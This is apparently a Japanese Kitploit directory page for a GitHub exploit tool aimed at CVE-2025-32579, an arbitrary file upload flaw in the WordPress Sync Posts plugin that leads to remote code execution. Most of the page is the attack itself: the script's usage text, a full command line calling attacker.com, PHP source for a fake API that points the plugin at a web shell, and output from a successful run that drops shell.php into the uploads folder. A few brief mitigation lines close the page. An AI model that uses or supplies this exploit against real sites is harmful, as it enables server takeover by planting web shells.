Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-32579 — WordPress Sync Posts Plugin <= 1.0 には任意のファイルアップロードの脆弱性があります。 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-32579
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubnxploited/cve-2025-32579

CVE-2025-32579

WordPress Sync Posts Plugin <= 1.0 には任意のファイルアップロードの脆弱性があります。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

⚠️ CVE-2025-32579 - Sync Posts プラグインを介した重大な RCE (WordPress)

📦 影響を受ける: Sync Posts <= 1.0
🧨 CVSS スコア: 9.9 CRITICAL
📁 CVSS ベクター: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H


🧠 脆弱性の概要

Sync Posts WordPress プラグイン (SoftClever Limited 製) には、制限なしファイルアップロードの脆弱性があり、認証済み攻撃者が任意の PHP ファイル (Web シェルなど) をサーバーにアップロードして実行できるようになります。

🔓 根本原因:

  • プラグインは JSON 投稿を返す website_url を受け入れます。
  • 検証なしに投稿コンテンツから画像を盲目的に取得します。
  • ファイルタイプ、MIME タイプ、パスに関する制限は一切適用されません。
  • すべての画像 (PHP ファイルであっても) がダウンロードされ、wp-content/uploads 内に保存されます。

🚨 なぜ危険なのか

  • ✅ リモートコード実行 (RCE)
  • ✅ Web シェルをサーバーに直接アップロード
  • ✅ 最小限の権限のみ必要 (認証済みユーザーのみ)

⚙️ スクリプトの説明 (エクスプロイト)

エクスプロイトスクリプトは一連の流れ全体を自動化します:

  1. 📥 提供された認証情報を使用して WordPress にログインします
  2. 🧠 <img src="https://raw.githubusercontent.com/nxploited/cve-2025-32579/HEAD/..."> としてシェルを含む JSON 投稿を返す偽の API PHP を生成します
  3. 📡 悪意のある website_url を admin-ajax.php?action=sync_posts に送信します
  4. 💣 プラグインにシェルを取得させ、/uploads/ に保存させます
  5. ✅ Referer や nonce は不要 — セッション Cookie で十分です

root@kitploit:~
usage: CVE-2025-32579.py [-h] -u URL -un USERNAME -p PASSWORD -ws WEBSITE -shell WEBSHELL

Exploit For CVE-2025-32579 Sync Posts # By: Nxploited ( Khaled Alenazi )

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://target.com/wordpress)
  -un, --username USERNAME
                        Username to login
  -p, --password PASSWORD
                        Password to login
  -ws, --website WEBSITE
                        URL to fake API (e.g., http://attacker.com/Khaled_alenazi.php)
  -shell, --webshell WEBSHELL
                        Web shell URL used inside the fake API (can be a test image)
                                                                                       

💻 使用手順

📌 コマンド形式:

root@kitploit:~
python3 CVE-2025-32579.py -u http://target/wordpress -un admin -p pass123 -ws http://attacker.com/Khaled_alenazi.php -shell http://attacker.com/shell.php

⚙️ 引数:

テスト用に実際のシェルの代わりにダミー画像を使用することもできます:

root@kitploit:~
--webshell https://via.placeholder.com/1x1.jpg

🧪 偽の API 出力例

これは Khaled_alenazi.php によって返される応答です:

root@kitploit:~
<?php
header('Content-Type: application/json');
echo json_encode([
  [
    "id" => 1,
    "title" => ["rendered" => "Nxploited"],
    "content" => [
      "rendered" => "<img src="http://attacker.com/shell.php">"
    ]
  ]
]);
?>

✅ エクスプロイト成功:

root@kitploit:~
[*] Attempting login...
[+] Logged in successfully.
[+] Generated fake API PHP file: Khaled_alenazi.php
[+] Sending exploit request to: http://target.com/wordpress
[+] Request sent successfully.
{
  "success": true,
  "data": {
    "message": "Posts imported successfully",
    ...
  }
}

🔥 エクスプロイト成功後:

  • シェルのパスと名前: shell.php
  • target.com/wp-content/uploads/2025/04/shell.php

🛠️ 修正 / 緩和策

  • website_url へのアクセスを内部ドメインまたはホワイトリスト登録済みホストに制限する
  • 画像の拡張子とコンテンツタイプを検証する
  • サニタイズなしにサードパーティの JSON を解析しない

🧷 リファレンス

CVE: CVE-2025-32579
エクスプロイト作成者: Nxploited (Khaled Alenazi)


ツールをダウンロード
FlagDescription
-u, --url対象 WordPress URL
-un, --usernameWordPress ユーザー名 (admin)
-p, --passwordWordPress パスワード
-ws, --website偽の投稿 JSON を返す悪意のある PHP ファイルの URL
-shell, --webshell`` 経由で注入する実際のシェルファイル